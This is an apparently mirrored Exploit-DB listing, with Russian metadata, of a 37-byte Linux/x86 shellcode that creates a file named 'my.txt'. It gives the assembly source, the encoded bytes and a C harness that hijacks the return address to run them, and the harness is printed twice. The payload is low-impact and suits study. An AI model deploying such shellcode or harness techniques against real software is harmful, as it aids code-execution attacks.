- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36701
- Проверка EDB
-
- Пройдено
- Автор
- MOHAMMAD REZA RAMEZANI
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2015-04-10
Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)
C:
/*
#Title: Create 'my.txt' in present working directory of vulnerable software
#Length: 37 bytes
#Date: 3 April 2015
#Author: Mohammad Reza Ramezani (mr.ramezani.edu [at] gmail com - g+)
#Tested On: kali-linux-1.0.6-i386
Section .text
global _start
_start:
push byte 8
pop eax
jmp short GoToCall
shellcode:
pop ebx
xor edx, edx
mov [ebx + 6], dl
push word 0544o
pop ecx
int 0x80
push byte 1
pop eax
xor ebx, ebx
int 0x80
GoToCall:
call shellcode
db 'my.txtX'
This shellcode can generalized by using of absolute path instead of 'my.txt'
*/
char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2"
"\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58"
"\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74"
"\x78\x74\x58";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}- Источник
- www.exploit-db.com
